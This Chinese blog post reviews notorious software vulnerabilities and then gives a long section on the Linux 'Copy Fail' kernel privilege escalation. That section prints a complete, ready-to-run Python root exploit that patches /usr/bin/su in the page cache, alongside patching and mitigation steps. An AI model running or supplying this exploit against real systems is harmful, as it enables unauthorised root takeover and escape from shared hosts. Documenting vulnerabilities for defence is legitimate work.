盘点那些较为严重软件漏洞集
2023-08-17 14:25:21 
阿炯
所有计算机程序都依赖代码来运行,但代码缺陷可能会带来软件漏洞。其中一些漏洞造成了广泛的恐慌和可怕的后果,让网络安全界为之震惊。2023年8月中旬,来盘点哪些软件漏洞是最严重最危险的呢?
1. Log4Shell
2. EternalBlue
3. Heartbleed
4. Double Kill
5. Chrome 零日漏洞
6. BlueKeep
7. ZeroLogon
8. Copy Fail
1. Log4Shell
Log4Shell软件漏洞存在于Apache Log4j中,这种流行的Java日志框架被全球数千万人使用。2021年11月,阿里云安全团队成员陈兆军发现了一个严重的代码漏洞。陈兆军最先注意到了Minecraft服务器中的这个漏洞。
该漏洞的正式名称为CVE-2021-44228,后来被称为Log4Shell。
Log4Shell安全漏洞是一个零日漏洞,因此在网络安全专家注意到它之前,它已被恶意分子利用了,这意味着他们可以远程执行代码。通过这种方式,黑客可以将恶意代码安装到Log4j中,从而实现数据盗窃、监视活动和恶意软件传播。虽然在发现Log4Shell漏洞后不久就发布了针对该漏洞的补丁,但这个安全漏洞绝非已远去。
网络犯罪分子至今仍在利用Log4Shell漏洞,不过补丁已经大大降低了威胁级别。据Rezilion声称,多达 26%的《我的世界》公共服务器仍然容易受到Log4Shell的攻击。
如果公司或个人没有更新其软件,Log4Shell漏洞可能仍然存在,为攻击者提供了可趁之机。
2. EternalBlue
EternalBlue(官方名称为MS17-010)是一个软件漏洞,于2017年4月开始兴风作浪。令人惊讶的是,这个漏洞部分是由美国国家安全局(NSA)开发的,这个庞大的美国情报机构以帮助美国国防部处理军事事务而闻名。
NSA在微软内部发现了EternalBlue漏洞,不过微软直到五年后才意识到这个漏洞。EternalBlue是NSA研发的一种潜在的网络武器,它是通过黑客攻击才让全世界都知道的。
2017年,一个名为Shadow Brokers(影子经纪)的黑客组织在数字化渗入美国国家安全局后,泄露了EternalBlue的存在。事实证明,这个漏洞让NSA获得了秘密的后门,可以访问一系列基于Windows的设备,包括运行Windows 7、8、Vista的设备。换句话说,NSA可以在用户不知情的情况下访问数百万台设备。
虽然EternalBlue有相应的补丁,但微软和公众对这个漏洞认识不足,多年来一直使设备容易受到攻击。
3. Heartbleed
Heartbleed安全漏洞于2014年被正式发现,不过它在两年前就存在于OpenSSL代码库中了。某些过时版本的OpenSSL库含有Heartbleed,发现后被认为很严重。
其官方名称为CVE-2014-0160,由于其在OpenSSL中的位置,它是一个非常严重的问题。由于OpenSSL用作网站数据库和最终用户之间的SSL加密层,许多敏感数据可以通过Heatbleed漏洞来访问。但在这个通信过程中,还有另一个未加密的连接,这是一种确保对话中的两台计算机都处于活动状态的基础层。
黑客找到了一种方法来利用这条未加密的通信线路,以便从先前安全的计算机中挤出敏感数据。从本质上讲,攻击者会向系统发送大量请求,希望获得一些有价值的信息。
Heartbleed在正式发布的当月已被修补,但旧版本的OpenSSL仍然容易受到该漏洞的攻击。
4. Double Kill
Double Kill(或CVE-2018-8174)是一个严重的零日漏洞,使Windows系统处于危险之中。这个漏洞于2018年被发现,由于这个漏洞出现在版本7以后的所有Windows操作系统中,它登上了网络安全新闻媒体的头条。
Double Kill是在Windows Internet Explorer浏览器中发现的,它利用了VB脚本漏洞。攻击方法涉及使用恶意Internet Explorer网页,其中包含滥用该漏洞所需的代码。
如果利用得当,Double Kill有可能为攻击者提供与原始授权用户同样的系统权限。在这种情况下,攻击者甚至可以完全控制一个人的Windows设备。
2018年5月,Windows发布了Double Kill的补丁。
5. Chrome 零日漏洞
CVE-2022-0609是另一个在2022年发现的严重软件漏洞。这个基于Chrome的漏洞被证明是一个零日漏洞,被攻击者在外头肆意利用。
这个漏洞可能会影响所有Chrome用户,这就是为什么它的严重程度如此之高。CVE-2022-0609是所谓的“免费后使用”漏洞,这意味着它能够远程更改数据并执行代码。
没过多久,谷歌就在Chrome浏览器更新版中发布了针对CVE-2022-0609的补丁。
6. BlueKeep
2019年5月,网络安全专家Kevin Beaumont发现了一个名为BlueKeep的严重软件漏洞。该漏洞可能存在于微软的远程桌面协议(RDP)中,该协议用于远程诊断系统问题,并允许用户从另一台设备远程访问其桌面。
BlueKeep的正式名称为CVE-2019-0708,它是一个远程执行漏洞,这意味着它可以用来在目标设备上远程执行代码。微软开发的概念证明表明,被攻击的计算机可以在一分钟内被攻击者攻破并接管,这突显了该漏洞的严重性。
一旦设备被访问,攻击者就可以在用户桌面上远程执行代码。
BlueKeep的一个优点是,它只影响旧版本的Windows,包括如下:
Windows Vista、XP、7
Windows Server 2003、2008、2008R2
如果你的设备运行的Windows操作系统比上面列出的还要晚,可能不需要担心BlueKeep。
7. ZeroLogon
ZeroLogon或官方名称CVE-2020-1472,是2020年8月发现的基于微软的软件安全漏洞。通用漏洞评分系统(CVSS)在严重程度上给这个漏洞打了10分,因此高度危险。
该漏洞可以利用通常存在于Windows企业服务器上的活动目录资源,其正式名称为活动目录Netlogon远程协议。
ZeroLogon将用户置于险境之中,因为它有可能改变敏感的帐户详细信息,包括密码。该漏洞利用身份验证方法,因而无需验证身份即可访问帐户。
在发现该漏洞的同一个月,微软发布了ZeroLogon的两个补丁。
软件漏洞让人忧心忡忡
世界对软件的依赖程度如此之高,因此出现错误和缺陷很自然;但是其中一些代码错误可能会带来可以被高度利用的安全漏洞,从而使提供商和用户都面临危险。
参考来源见此处。
8. Linux致命漏洞(Copy Fail),仅732 字节获取 root 权限
2026年5月上旬,一个无特权的本地用户,可以向 Linux 系统上任何可读文件的页缓存(page cache)写入 4 个可控字节,并利用这一点获取 root 权限。没有竞态条件,不区分发行版本,没有编译依赖。100% 成功率,单次命中。这就是 Linux 内核高危本地提权漏洞 CVE‑2026‑31431(Copy Fail),攻击者只需一个普通用户权限就能用极小的脚本瞬间获得 root 控制权,并且修改只存在于内存中、很难用传统手段检测。
漏洞从哪来
Linux 内核在2017年的 algif_aead 模块引入了一项"原地优化"(in-place optimization),优化本身很合理:当加密操作的源和目标指向同一块内存时,可以省掉一次拷贝;但问题出在 authencesn 这个 AEAD 算法的实现上。它在处理 AAD ESN 字节时,把调用者的目标缓冲区当成了临时草稿区(scratch pad),在合法输出区域之后多写了 4 个字节,并且从未恢复它们。
这就是 "Copy Fail" 名字的由来——该拷贝的地方,拷贝失败了。通过 AF_ALG 套接字 + splice() 系统调用的组合,攻击者可以让页缓存中的页面(page-cache pages)进入加密子系统的可写目标 scatterlist。于是这 4 个字节的越界写入,直接落到了页缓存中。
Copy Fail不是“理论上存在”的漏洞,而是攻击者非常喜欢的一种武器:
危害等级:高危(CVSS 7.8)
攻击前提:已拥有任何一个普通低权限用户(如 WebShell、泄露的 SSH 密钥、弱口令入侵、容器逃逸后的普通用户)
攻击结果:直接获得 Root 权限,全面接管系统
安全研究人员指出,该漏洞利用了 Linux 内核 AF_ALG加密接口与 splice()系统调用的组合,可以对任意可读文件的页缓存进行受控写入。
一个最关键的危险点:写入只发生在内存中,不会落盘,因此传统的 file integrity 检测工具根本发现不了。一旦攻击者进入你家大门,这个漏洞能让他瞬间拿到保险柜的全部钥匙。
为什么这个漏洞如此危险?
1.可移植——同一个脚本,Ubuntu、Amazon Linux、RHEL、SUSE 全部通杀。无需修改偏移、无需版本检查、无需重新编译。
2.微型——732 字节的 Python 脚本,仅依赖标准库(os、socket、zlib)。无编译载荷,无外部依赖。
3.隐蔽——写入绕过了 VFS 路径,被篡改的页缓存不会被标记为 dirty。没有任何东西落到磁盘上。系统重启后,缓存从磁盘重新加载,文件恢复原状。取证镜像显示的是未修改的原始文件。
4.跨容器——页缓存在宿主机上全局共享。一个拥有正确原语的 Pod 可以攻破整个节点,跨越租户边界——这是容器逃逸原语,而不仅仅是本地提权。
攻击演示
同一个 732 字节脚本,在四个不同发行版上同时执行:
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")
然后使用 python 执行这段脚本再 su
就这么简单。不需要编译,不需要安装工具,甚至可以在容器中一条命令就让 root 到手。
已验证受影响的发行版:Debian、Arch、Fedora、Rocky、Alma、Oracle Linux 等其他运行受影响内核的发行版同样受影响。
谁最该担心?
云厂商以及saas服务商们:
| 风险等级 | 场景 | 原因 |
| 高危 | 多租户 Linux 主机 | 共享开发机、跳板机、构建服务器——任何多用户共享内核的环境 |
| 高危 | Kubernetes / 容器集群 | 页缓存在宿主机上共享,Pod 可以攻破节点并跨越租户边界 |
| 高危 | CI/CD Runner | GitHub Actions 自托管 Runner、GitLab Runner、Jenkins Agent——执行不可信 PR 代码的环境 |
| 高危 | 运行用户代码的云 SaaS | Notebook 托管、Agent 沙箱、Serverless 函数——任何租户可以执行代码的环境 |
| 中危 | 标准 Linux 服务器 | 单租户生产环境,仅团队有 shell 访问权限 |
| 低危 | 单用户笔记本/工作站 | 你已经是唯一用户,漏洞本身不授予远程攻击者访问权限 |
修复方案
1. 打补丁(首选方案)
更新内核到包含主线 commit a664bf3d603d 的版本。该补丁回退了 2017 年的 algif_aead 原地优化,确保页缓存页面不再出现在可写的目标 scatterlist 中。主流发行版已经开始推送修复。
2.禁用 algif_aead
# echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
# rmmod algif_aead 2>/dev/null || true
Copy Fail 是一个教科书级别的逻辑漏洞案例。它不需要复杂的利用技术,不依赖脆弱的竞态窗口,不针对特定内核版本。一个 9 年前引入的性能优化,在一行直线代码中沉睡了近十年。
根据 Debian 官方安全追踪器的验证,以下版本状态如下:
Trixie 和 Bookworm 的主仓库(main suite)默认版本仍存在漏洞,因此必须确保 security 仓库已正确启用,才能收到修复。
Bullseye(Debian 11)用户目前仍处于 vulnerable 状态,请密切关注后续安全更新,并优先执行下方的临时缓解方案。
另外基于 Debian 13 的最新衍生版(如最新版 MX Linux)也已同步修复。
结合国家信息安全漏洞库(CNNVD)、CISA以及多位安全研究员的视角来看,本地提权漏洞的威胁往往容易被一线运维低估:
1.攻击链中的“致命决胜点”攻击者通过弱口令、Web 漏洞、泄露的密钥、容器逃逸等方式先拿到一个低权限账号(这一步相对容易),再利用 Copy Fail 瞬间提权到 root,完成从“普通游客”到“系统管理员”的致命跨越。
2.隐蔽性极强,传统检测方法失效Copy Fail 对 setuid 程序的篡改只发生在页缓存(内存)中,不会写入磁盘,因此无论 aide、tripwire、rkhunter,都无法检测到异常。
3.横向移动的“超级跳板”拿到 root 后,攻击者可以窃取数据库、植入持久化后门、抓取内网凭据,进而控制更多服务器。
另外,微软 Defender 安全团队在其分析中也明确提到:该漏洞会影响多个主流 Linux 发行版,在云环境、CI/CD 流水线、Kubernetes 集群中的影响面非常广。目前已观察到 PoC 测试活动,未来几天内可能会被现实攻击者积极利用。
推荐修复流程
# 1. 更新软件包列表并全量升级(务必加上 --with-new-pkgs)
apt update && sudo apt full-upgrade -y
# 2. 确认内核版本,Trixie 应 >= 6.12.85-1
uname -r && uname -v
# 3. 重启服务器,使新内核生效
reboot
如何确认修复成功
# 查看当前运行的内核版本
uname -r
# Trixie 用户应看到 6.12.85-1 或更高版本
# Bookworm 用户应看到 6.1.170-1 或更高版本
多说两句:Debian 13(Trixie)一个重要的配置变更: Debian 13 已不再使用传统的 /etc/apt/sources.list,而是将 apt 源配置迁移到 /etc/apt/sources.list.d/debian.sources文件中。新格式大致如下:
Types: deb deb-src
URIs: https://deb.debian.org/debian
Suites: trixie trixie-updates
Components: main non-free-firmware
Enabled: yes
Signed-By: /usr/share/keyrings/debian-archive-keyring.gpg
Types: deb deb-src
URIs: https://security.debian.org/debian-security
Suites: trixie-security
Components: main non-free-firmware
Enabled: yes
Signed-By: /usr/share/keyrings/debian-archive-keyring.gpg
重点检查 security 仓库对应的 Enabled是否是 yes。如果发现被注释或禁用,请手动改回 yes 后再执行 apt update && apt full-upgrade。
业务连续性要求无法立刻重启请按以下步骤止损:
最推荐的方式:禁用 algif_aead内核模块
Copy Fail 漏洞的核心触发点就是 algif_aead模块。直接禁用它,漏洞的利用路径就被切断了。
# 1. 禁止模块在下次重启后自动加载
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
# 2. 立即卸载已加载的模块(如果需要)
rmmod algif_aead 2>/dev/null || true
这个临时缓解对正常业务几乎无影响:不会影响 dm‑crypt/LUKS、kTLS、IPsec、OpenSSL、GnuTLS、SSH 等标准服务。
仅在应用程序显式配置使用 afalg engine或直接绑定 AEAD/skcipher/hash 套接字时才会受影响。可以用 lsof | grep AF_ALG评估当前的 afalg 使用情况。
辅助加固措施(在禁用模块的基础上追加)
# 1. 临时封堵可疑普通用户登录
passwd -l <可疑用户名>
# 2. 快速排查系统中是否存在异常账号或可疑登录
cat /etc/passwd | grep -E "sh$|bash$"
lastlog | grep -v "Never"
# 3. 检查当前系统登录会话
who
# 4. (如适用)加强 SSH 配置
# 在 /etc/ssh/sshd_config 中强化:
# PermitRootLogin no
# PasswordAuthentication no
# 修改后重启 sshd: systemctl restart sshd
攻击链路可能是:低权限进入 → 本地提权 → 全机沦陷
建议逐步建立以下常态化机制:
每周漏洞巡检:关注 Debian/Ubuntu/Red Hat 官方安全公告
自动补丁窗口:为非核心业务设置定期自动更新
内核升级计划:为核心业务规划定期的重启窗口
主机行为审计:部署 auditd或 Osquery,监控可疑的提权行为
security 仓库检查清单:尤其 Debian 13 用户,定期确认 /etc/apt/sources.list.d/debian.sources中 security 仓库为 Enabled: yes
Kubernetes 用户特别注意
如果 K8s Worker Node使用 Debian 作为底层操作系统,风险将进一步放大:
普通权限容器 → 节点内核漏洞 → 获得节点 Root 权限 → 窃取集群凭据 → 横向控制整个集群
请立即检查并落实所有 Worker 节点的操作系统补丁更新。
Copy Fail不是“远程一键入侵”的漏洞,但它是攻击者最喜欢的那一类:
利用稳定,成功率高(非 race condition,确定性漏洞)
提权快速,仅需 732 字节脚本
隐蔽性强,仅内存篡改,传统检测工具无效
影响范围广,覆盖 2017 年以来大量发行版